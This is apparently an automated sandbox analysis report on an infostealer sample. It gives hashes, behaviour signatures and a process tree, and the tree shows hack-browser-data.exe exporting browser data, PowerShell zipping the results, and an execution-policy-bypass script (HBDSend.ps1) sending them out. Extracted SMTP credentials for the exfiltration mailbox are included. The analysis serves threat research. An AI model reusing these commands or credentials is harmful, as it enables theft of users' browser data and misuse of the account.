Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Overview

overview

10

Static

static

3

2024-10-08...uk.exe

windows7-x64

10

2024-10-08...uk.exe

windows10-2004-x64

10

Analysis

  • max time kernel
    96s
  • max time network
    103s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    08/10/2024, 03:56

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    2024-10-08_fc98f5d0bc1552483a44c85d53384a6e_ryuk.exe

  • Size

    14.0MB

  • MD5

    fc98f5d0bc1552483a44c85d53384a6e

  • SHA1

    d696097fec437d4f31739d1460b180e67795b9d6

  • SHA256

    33a32609cb5acf54abeef9eed08d24a03dfd138ddd4b6132c8add72d8232b43a

  • SHA512

    5b3f9769de97b61568611ed852efcdcb52d9d2371026dc434aeab2f42197cc6a876a24c1132ec0861bd6895c7c9ca164370da9ae63009bd4432ef8ed9dddefa4

  • SSDEEP

    393216:IxhOGfw/zTNVC2bH2McKpqeTP91UIU537BEBE/P:aIoszT7C2KMzg537iBEH

Score
10/10
hackbrowserdatadiscoveryexecutioninfostealerspywarestealer

Malware Config

Extracted

Credentials

  • Protocol:     smtp
  • Host:
    smtp.mail.ru
  • Port:
    587
  • Username:
    [email protected]
  • Password:
    acC1BbG3DWMqx8btFk0h

Signatures

  • An open source browser data exporter written in golang. 2 IoCs
  • HackBrowserData

    An open source golang web browser extractor.

    infostealerhackbrowserdata
  • Blocklisted process makes network request 1 IoCs
  • Checks computer location settings 2 TTPs 2 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 1 IoCs
  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

    spywarestealer
  • Browser Information Discovery 1 TTPs

    Enumerate browser information.

    discovery
  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Using powershell.exe command.

    execution
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Delays execution with timeout.exe 2 IoCs
    evasion
  • Modifies registry class 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 4 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of WriteProcessMemory 16 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\2024-10-08_fc98f5d0bc1552483a44c85d53384a6e_ryuk.exe
    "C:\Users\Admin\AppData\Local\Temp\2024-10-08_fc98f5d0bc1552483a44c85d53384a6e_ryuk.exe"
    1⤵
    • Checks computer location settings
    • Modifies registry class
    • Suspicious use of WriteProcessMemory
    PID:960
    • C:\Windows\System32\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\hideCMD.vbs"
      2⤵
      • Checks computer location settings
      • Suspicious use of WriteProcessMemory
      PID:2700
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\ha.bat" "
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:1596
        • C:\Windows\system32\cmd.exe
          cmd /c "start "" .\toboot\hack-browser-data.exe -f json --dir res --zip"
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:1348
          • C:\Users\Admin\AppData\Local\Temp\toboot\hack-browser-data.exe
            .\toboot\hack-browser-data.exe -f json --dir res --zip
            5⤵
            • Executes dropped EXE
            PID:1264
        • C:\Windows\system32\timeout.exe
          timeout /t 4
          4⤵
          • Delays execution with timeout.exe
          PID:3000
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell Compress-Archive -Path ".\res" -DestinationPath .\res.zip -CompressionLevel Fastest -Force
          4⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:4256
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell -ep bypass -file "HBDSend.ps1"
          4⤵
          • Blocklisted process makes network request
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:1260
        • C:\Windows\system32\timeout.exe
          timeout /t 4
          4⤵
          • Delays execution with timeout.exe
          PID:2180

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
    Filesize

    3KB

    MD5

    fe3aab3ae544a134b68e881b82b70169

    SHA1

    926e9b4e527ae1bd9b3b25726e1f59d5a34d36a6

    SHA256

    bda499e3f69d8fe0227e734bbb935dc5bf0050d37adf03bc41356dfcb5bcca0b

    SHA512

    3fbd3499d98280b6c79c67b0ee183b27692dbc31acf103b4f8ca4dcdf392afff2b3aad500037f4288581ed37e85f45c3bbb5dcde11cddf3ef0609f44b2ecb280

    Download Submit

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
    Filesize

    1KB

    MD5

    c86ee90124c6374bc4c440a308eceb38

    SHA1

    b2075096ffa0abb9ba5abb0348e921e03fdf97b1

    SHA256

    99412b05f5ff937533a9c7dfc5ae65a4626c8f7f8b985c0b3a1e0ab5933863c8

    SHA512

    3dfadcd144a269cdf379aeb7f911642823e0426cda40cd231d90360f2aef7f6e49e68e0eaf742327ea3422a373128fb9652f8a361caa6ba99b8623eef1c6b8de

    Download Submit

  • C:\Users\Admin\AppData\Local\Temp\.git\logs\refs\remotes\origin\HEAD
    Filesize

    206B

    MD5

    161010715d0c362173bf20c28c2fd9b7

    SHA1

    f80849d90d3a9843a658e5560f000f97fc4d8d01

    SHA256

    de309dabda86493c2e3260c1e17dd794211789121ffbd93a291909d48a5697e7

    SHA512

    c7599a1d21226e3fb73e669a9451b14dfc6d0d9ce6866bc382e32c645f79671f6457b15cf5e377006bc14f3cd8dd7754a5ff1e4496c1bb4129d7d271ff2293c4

    Download Submit

  • C:\Users\Admin\AppData\Local\Temp\HBDSend.ps1
    Filesize

    390B

    MD5

    4802a57c6fccba23e67bc66c31356d4f

    SHA1

    fc030aa0f325b17643f58c2659c0742890d9f3d7

    SHA256

    5578ae9942d3aeba7898924a489752dd6c209d4b22cbbdb2eb5f946c61d0df35

    SHA512

    9c2843455b90f14393ff1f6e7b0736607ba16a0e89eef4a9f0d6b7affd3430b2b6dcf87d588758f99d3ae29fcb365e584e40d760024dd1ea2108b3d9190d0b0a

    Download Submit

  • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ssqlpobn.fq3.ps1
    Filesize

    60B

    MD5

    d17fe0a3f47be24a6453e9ef58c94641

    SHA1

    6ab83620379fc69f80c0242105ddffd7d98d5d9d

    SHA256

    96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

    SHA512

    5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

    Download Submit

  • C:\Users\Admin\AppData\Local\Temp\chromiumKey
    Filesize

    8KB

    MD5

    958a1ff72044f30f68af82e585733974

    SHA1

    9ac41e433578b0e8aaa2f4b8ca7cb228d9d412f3

    SHA256

    d53a7c0b594df00f6c490776af5e2f4697c585a470eb9d2c5d77292722756eaf

    SHA512

    de9d693a3c8ae4c6814427120bb163737e7714bec98d5c2a825e163addfd497818a9ba9c55b5ca2bddf5b4b2f1ba9588586b2a96405ee443b8babf2433d98256

    Download Submit

  • C:\Users\Admin\AppData\Local\Temp\ha.bat
    Filesize

    338B

    MD5

    fddf7e3115d866f57c8ee7c39faba7c7

    SHA1

    380fd6c70888e59b3e6422b482bd993a1c6f4092

    SHA256

    58eba8234f52ee4f5cb65bcc38f612fcd0025fbfaaa092f994aa0af02c2623cd

    SHA512

    3efc29aab85d86e83f533baadd275b4692eef50cf1cd600fc6bd27f110bfc0494353ed99679e9e93e3cdc119ea05161cb35906855ad8dedcf6f2324f87041d55

    Download Submit

  • C:\Users\Admin\AppData\Local\Temp\hideCMD.vbs
    Filesize

    51B

    MD5

    8cb717954c207bc5d1866f0b91f3705b

    SHA1

    bb2eb348bbaae1c03f0e8a69fe632acf3654906d

    SHA256

    5098540013c04d7a204e5ccd000d0342e2724b2a5747c6cde3423c33670e7125

    SHA512

    28671621ebc6b0e2ef08d910770463935f484b3a2bbf2f2d902436856ca63dfefb1d4c5c57bb0eb84d973295bf7dccf4767a72ed26b62f9b7476c5ac51b858bd

    Download Submit

  • C:\Users\Admin\AppData\Local\Temp\localStorage\CURRENT
    Filesize

    16B

    MD5

    46295cac801e5d4857d09837238a6394

    SHA1

    44e0fa1b517dbf802b18faf0785eeea6ac51594b

    SHA256

    0f1bad70c7bd1e0a69562853ec529355462fcd0423263a3d39d6d0d70b780443

    SHA512

    8969402593f927350e2ceb4b5bc2a277f3754697c1961e3d6237da322257fbab42909e1a742e22223447f3a4805f8d8ef525432a7c3515a549e984d3eff72b23

    Download Submit

  • C:\Users\Admin\AppData\Local\Temp\res.zip
    Filesize

    1KB

    MD5

    da4955f00150bd6659d9fede22cdb031

    SHA1

    b62d735d547383fc8cd99a39ec8b09373dd0aee7

    SHA256

    7b2ca17aef33a27c0a304a1db291d62510e6bac8470354d8a20508ad5827dccd

    SHA512

    aa657169a85d1ac7c5691a7c3eed6cad19bd6c6671f246045bcc3c94df7338a5bd4a0a382588d98539b6c106ec38997a24ea14f25c67b2d564c1197e54e86e09

    Download Submit

  • C:\Users\Admin\AppData\Local\Temp\res\firefox_42vejdix_default_release_bookmark.json
    Filesize

    1023B

    MD5

    be3ef38a5549839f142b69e300d32859

    SHA1

    0d5f559740bbdafbb8ba682ce3c36ad5ad2d9729

    SHA256

    2cf82dab7376ec4da21b96f13cc93f485ca648d39be003774f7a77ca130e0a58

    SHA512

    ea9734b74c666ef127d28358c72b6fb79fccc5bb59d81a52b15865fd2760101e91b958944d95b02818859b4d4b608748e4a68160dfe2a729b038803606b4242a

    Download Submit

  • C:\Users\Admin\AppData\Local\Temp\res\firefox_42vejdix_default_release_extension.json
    Filesize

    2KB

    MD5

    c69904bff2d0e3fdae0d5fcda30ef19d

    SHA1

    fead75d0019382bfe4250c1c05c69f8845cb1f77

    SHA256

    0151f2d1ed4d991e25f8e657eced0406b0fe4011a34013dbe5eff7809e80061d

    SHA512

    406733f0f5f0b8f9d3e898b28b1f89be35e48a86391ed317b0f9e60aebdd1f9581acf3863c8490c3dcb72ed989aed5b33458e5553944968ce318e5ac850c3c77

    Download Submit

  • C:\Users\Admin\AppData\Local\Temp\toboot\hack-browser-data.exe
    Filesize

    20.9MB

    MD5

    6c66514d0e3b4cf5a2e4c2844efcb1f3

    SHA1

    682d46485ce44e719309f80483221d82011c3779

    SHA256

    7374c9b387000b813be75e10c2b988bf8d892985de63eb7446e11ceb225312e8

    SHA512

    4ca2657b47f145db2b162428ed057b52260a0db6758bf21803d75c6451914918f6392a4f8eb4216929e9feac1da70c161bd5ff61878d328863c9267c798c81a5

    Download Submit

  • memory/1264-262-0x00007FF70BCD0000-0x00007FF70D15E000-memory.dmp

    Filesize

    20.6MB

    Download

  • memory/4256-268-0x00000223589B0000-0x00000223589D2000-memory.dmp

    Filesize

    136KB

    Download

  • memory/4256-273-0x0000022358A50000-0x0000022358A62000-memory.dmp

    Filesize

    72KB

    Download

  • memory/4256-274-0x00000223589F0000-0x00000223589FA000-memory.dmp

    Filesize

    40KB

    Download